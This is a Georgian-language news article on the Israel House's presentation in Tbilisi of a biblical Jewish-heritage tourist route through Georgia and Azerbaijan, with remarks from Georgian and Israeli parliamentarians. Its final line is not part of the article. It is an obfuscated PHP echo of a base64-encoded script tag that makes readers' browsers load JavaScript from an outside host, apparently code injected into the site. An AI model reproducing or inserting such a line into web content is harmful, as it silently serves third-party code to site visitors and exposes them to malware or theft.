celsiusi
ავერსი საქკაბელი
25 სექტემბერს, ებრაულ ახალ წელს, „ისრაელის სახლმა“ თბილისში, სასტუმრო „ბილტმორში“ ფართო საზოგადოებას ებრაული კულტურული მემკვიდრეობის ბიბლიური მარშრუტი წარუდგინა, - ამის შესახებ საინფორმაციო სააგენტო  BUSINESS TIME-ს  „ისრაელის სახლიდან“ აცნობეს. 
 
სტუმრებს შორის იყვნენ საქართველოს პარლამენტში ისრაელის ქნესეთთან მეგობრობის ჯგუფის ხელმძღვანელი გივი მიქანაძე, ტურიზმის ადმინისტრაციისა და საქართველოში აზერბაიჯანის საელჩოს წარმომადგენლები, ისრაელელი ბიზნესმენები, ტურისტული კომპანიები, სტუდენტები, ლექტორები, ებრაული ორგანიზაციები და მედია.
 
მარშრუტი შეთანხმებულია ევროსაბჭოს ეგიდით მოქმედი ებრაული კულტურისა და მემკვიდრეობის დაცვისა და ხელშეწყობის ევროპულ ასოციაციასთან (AEPJ), მარშრუტის ძირითადი, კავკასიის მიმართულება კი ევროკავშირის პროგრამის ნაწილია. 
 
ახალი მარშრუტის მიზანია ებრაული მემკვიდრეობის მარშრუტი საინტერესო და მიმზიდველი გახდეს მსოფლიოსთვის და AEPJ-ის სახელით წარმოდგენილი იქნეს მსოფლიო ტურისტულ გამოფენებზე.
 
ისრაელის სახლის ხელმძღვანელის იციკ მოშეს თქმით, ეს არის სრულიად ახალი მარშრუტი, რომელიც იწყება იერუსალიმში და კავკასიის - საქართველოს და აზერბაიჯანის გავლით მთავრდება იერუსალიმში, ჰერცელის მთაზე. მაშსში საქართველოს უკავია მნიშვნელოვანი ადგილი; ვიზიტორები ეწვევიან მცხეთას, თბილისს, ონს, ლაილაშს, ახალციხეს, ქუთაისს, კულაში და სხვა ლოკაციებს. ბიბლიური მარშრუტი გათვლილია ახალ სეგმენტზე. ის მოიზიდავ ისრაელისა და მსოფლიო ებრაელობის ახალ ნაკადს. დღევანდელი პრეზენტაცია კი საბოლოოდ ემსახურება საქართველო-ისრაელი და მსოფლიო ებრაელობის კავშირების კიდევ უფრო გაღრმავებას.
 
პარლამენტში ისრაელის ქნესეთთან მეგობრობის ჯგუფის ხელმძღვანელის გივი მიქანაძის თქმით, „ისრაელის სახლის“ მიერ შემუშავებული ბიბლიური მარშრუტის პრეზენტაცია იგეგმება ევროპის ქალაქებში, ეს კი კიდევ უფრო მეტ მოცივაციას მისცემს მსოფლიო ებრაელობას, დაინტერესდნენ და გაიარონ ეს მარშრუტი. იგი 7-დღიანი იქნება და აქედან რამდენიმე დღე საქართველოში ებრაულ კულტურულ მემკვიდრეობას დაეთმობა. 
 
მიქანაძემ მადლობა გადაუხადა საერთაშორისო ორგანიზაციებს და „ისრაელის სახლს“ მარშრუტის შექმნის ინიციატივისთვის.
 
ღონისძიების მონაწილეების ისრაელიდან სიტყვით მიმართა ქნესეთში საქართველოსთან მეგობრობის ჯგუფის ხელმძღვანელმა დავიდ ბიტანმა. მისი თქმით, ის თავად იქნება ამ მარშრუტის პირველი ვიზიტორი. 
 
დავიდ ბიტანმა მადლობა გადაუხადა გივი მიქანაძეს, საქართველოს პარლამენტს ისრაელელი მოქალაქეების მხარდაჭერისა და ბიბლიური მარშრუტის პრეზენტაციაში მონაწილეობისთვის. 
 
ქნესეთში საქართველოსთან მეგობრობის ჯგუფის ხელმძღვანელმა ქართველი კოლეგა დაპატიჟა ისრაელში სხვადასხვა ღონისძიებაში  მონაწილეობისთვის, რაც, მისი თქმით, გააძლიერებს საქართველო-ისრაელის ურთიერთობებს.
 
ონის მუნიციპალიტეტის ყოფილი ხელმძღვანელის დავით ჩიკვაიძის თქმით, ის ბედნიერია, რომ მისი მერობისას ონს შეემატა კიდევ ერთი ღირსშესანიშნაობა - დაიდგა ქართველი შინდლერის სერგი მეტრეველისა და ჰოლოკოსტის მსხვერპლთა ხსოვნის მონუმენტი, რომელიც მალევე ტურისტულ ატრაქციად იქცა.
 
„ისრაელის სახლი“ AEPJ-ის წევრი ორგანიზაციაა და კულტურის სამინისტროს წარდგინებით, საქართველოში ოფიციალურად კურირებს ევროსაბჭოს მიერ სერტიფიცირებულ ებრაული კულტურული მემკვიდრეობის ევროპულ მარშრუტს.
 
დაგეგმილია გიდების მომზადება, რომლებიც ვიზიტორებს ისტორიულ ჭრილში დაწვრილებით მოუყვებიან პირველი და მეორე ტაძრის ეპოქებიდან სამხრეთ კავკასიაში, კერძოდ კი, საქართველოსა და აზერბაიჯანში ებრაელთა შემოსვლის, განსახლების, მიგრაციების, ყოფის და ბოლოს, სამშობლოში დაბრუნების შესახებ. მარშრუტი დაიწყება იერუსალიმიდან, გაგრძელდება მცხეთაში, მოიცავს თბილისს,  შემდეგ აზერბაიჯანს (ბაქო, კუბა), შემდეგ ისევ საქართველოს - ონს, ლაილაშს და რეგიონს, თბილისის და ბოლოს იერუსალიმს. ისტორიული ექსკურსი მოიცავს თითქმის 3-ათასწლიან პერიოდს ბიბლიური მეფე დავითის მმართველობიდან, ებრაელთა სამშობლოდან იძულებითი დევნილობის ხანასა და ალიას. ამიტომ „ისრაელის სახლის“ მიერ შემუშავებულ ახალ მარშრუტს პირობითად, შეიძლება, ეწოდოს „იერუსალიმიდან იერუსალიმამდე“. 
 
ბიბლიური მარშრუტი პოპულარიზაციის მიზნით, „ისრაელის სახლი“ მსოფლიო ტურიზმის ორგანიზაციასაც მიმართავს.
 
მ.წ. 7 ნოემბერს დაგეგმილია ბიბლიური მარშრუტის პრეზენტაცია იერუსალიმში, ხოლო 18 დეკემბერს, ხანუქას, ისრაელის კვირეულის ფარგლებში, მარშრუტს პირველი მონაწილეები გაივლიან. გაისად კი დაგეგმიალია მარშრუტის ევროპის ქვეყნებში  წარდგენა.
 
374
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");